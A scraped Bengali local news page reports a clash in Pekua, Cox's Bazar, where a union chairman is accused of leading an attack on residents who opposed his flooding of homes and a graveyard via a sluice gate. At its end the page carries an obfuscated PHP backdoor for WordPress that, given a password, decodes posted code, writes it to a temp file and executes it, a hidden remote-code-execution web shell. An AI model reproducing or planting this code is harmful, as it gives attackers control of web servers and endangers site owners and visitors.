• বুধবার, ২৬ জুন ২০২৪, ১২:০৬ পূর্বাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

পেকুয়া চেয়ারম্যানের নেতৃত্বে এলাকাবাসীর উপর হামলা

কক্সবাজারবানী’র সাথে থাকুন
আপডেট : সোমবার, ২১ আগস্ট, ২০২৩

পেকুয়ায় ইউপি চেয়ারম্যানের নেতৃত্বে সৈনিকলীগ নেতাকর্মী ও এলাকাবাসীর উপর হামলা

পেকুয়া প্রতিনিধি, কক্সবাজার

কক্সবাজারের পেকুয়ায় ইউপি চেয়ারম্যান নেতৃত্বে বঙ্গবন্ধু সৈনিকলীগ ও আওয়ামীলীগ নেতাকর্মী সহ এলাকাবাসীর উপর হামলার অভিযোগ উঠেছে চেয়ারম্যান নজরুল ইসলাম সিকদার বাবুল ও তাঁর বাহিনীর লোকজনের বিরুদ্ধে।

(১৯ আগস্ট) দুপুর ১টার দিকে রাজাখালী ইউনিয়নের ৯নং ওয়ার্ডের লালজান পাড়া মফিজুল্লার নাসি(পাউবোর স্লুইসগেট) উপরে বেড়িবাঁধে এই ঘটনা ঘটে।

স্থানীয় প্রত্যক্ষদর্শীরা জানান,লালজানপাড়াস্থ মফিজুল্লার নাসি (পাউবোর স্লুইগেট) রাজাখালী ইউনিয়ন পরিষদের চেয়ারম্যান নজরুল ইসলাম সিকদার বাবুলের ব্যক্তিগত মালিকনাধীন মৎস্য ঘেরে পানি ঢুকানোর জন্য স্লুইসগেটের দরজা তুলাতে গেলে চেয়ারম্যান ও তাঁর বাহিনীর লোকজনকে স্থানীয় এলাকাবাসী ইউনিয়ন বঙ্গবন্ধু সৈনিকলীগের সভাপতি মুহাম্মদ ফোরকানের নেতৃত্বে চেয়ারম্যানকে বলে আপনি আপনার মৎস্য ঘেরে মাছ চাষের জন্য পানি ঢুকিয়ে আমাদের বাড়ী- ঘর, কবরস্থান রাস্তা পানিতে তলিয়ে দিতে পারেন না এই কথা বলার সাথে সাথে চেয়ারম্যান ও তাঁর অনুগত লোকজন বঙ্গবন্ধু সৈনিকলীগ সভাপতি মুহাম্মদ ফোরকান, সাধারণ সম্পাদক সাহাদাত কবির সহ মৃত মোজাফফর আহমদের স্ত্রী খালেদা বেগম(৫৫) স্বামী মৃত মোজাফফর আহমদের স্ত্রী ফাতেমা বেগম (৩৫), ফোরকানের স্ত্রী জুবাইদা বেগম স্বামী জাকের হোছাইন অনেকে আহত করে। ফোরকানকে
মারধর করে নদীতে পেলে দেয়। আহতরা কোনভাবেই পালিয়ে হাসপাতালে চেয়ারম্যানের বাহিনীর ভয়ে গোপনে চিকিৎসা নিচ্ছেন।
স্থানীয়রা আরো জানান,লালজান পাড়া মসজিদ, কবরস্থান, ঘরবাড়ি রাস্তায় ঢুবা থাকার কারণে অতিষ্ঠ সাধারণ মানুষ। রাজাখালী ইউনিয়ন পরিষদের চেয়ারম্যান নজরুল ইসলাম সিকদার বাবুলের ব্যক্তি মালিকনাধীন মৎস্য ঘেরে পানি ঢুকানোর জন্য স্লুইসগেটে অতিরিক্ত লুকাচ্ছিলো বিগত দুই মাস থেকে পূর্নিমা ও অমাবস্যার জোয়ারের পানিতে লালজান পাড়া কবরস্থান ও মসজিদে সামনে রাস্তা সহ বেশ কয়েকটি রাস্তা তলিয়ে যায়। এর পর স্থানীয় লোকজন জনপ্রতিনিধিদের দরজায় দর্না দিয়েও কোন সুরাহা না পেয়ে স্থানীয় গণমাধ্যম কর্মীদেরকে তাঁদের দুর্ভোগের কথা গণমাধ্যমে তুলে ধরার জন্য অনুরোধ করলে কয়েকটি গণমাধ্যমে প্রকাশিত হয়। এরপর চেয়ারম্যান স্লুইসগেটের দরজা উঠিয়ে পানি ঢুকানোর জন্য গেলে স্থানীয় লোকজন থাকে বাঁধা দেয়। এসময় চেয়ারম্যান তাঁর লোকজন তাদের উপর হামলা চালায়।
এ বিষয়ে বঙ্গবন্ধু সৈনিকলীগ রাজাখালী ইউনিয়নের সভাপতি মুহাম্মদ ফোরকান বলেন,দুই মাস থেকে চেয়ারম্যান বাবুল মৎস্য ঘেরে পানি ঢুকিয়ে মানুষের ঘর- বাড়ী, কবরস্থান, রাস্তা পানিতে ঢুবিয়ে রাখে।এলাকার লোকজন প্রতিবাদ করায় আমি ও আমার এলাকাবাসীর উপর হামলা করে।

রাজাখালী ইউপির চেয়ারম্যান নজরুল ইসলাম সিকদার বাবুল বলেন, বিভিন্ন মাছে প্রজেক্ট মালিকরা আমাকে ফোন করে নাশি বন্ধর বিষয়ে অবগত করতে আমি চেয়ারম্যান হিসেবে পরিদর্শনে গেলে তাঁরা পূর্ব পরিকল্পিত ভাবে আমার উপর হামলা করে।

এ বিষয়ে পেকুয়া থানার ওসি মোহাম্মদ ওমর হায়দার বলেন ঘটনার খবর পেয়ে পুলিশ ঘটনাস্থলে পাঠিয়েছি। কেউ লিখিত অভিযোগ পেলে আইনগত ব্যবস্থা নেওয়া হবে।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বুধবার (রাত ১২:০৬)
  • ২৬শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ২০শে জিলহজ, ১৪৪৫ হিজরি
  • ১২ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}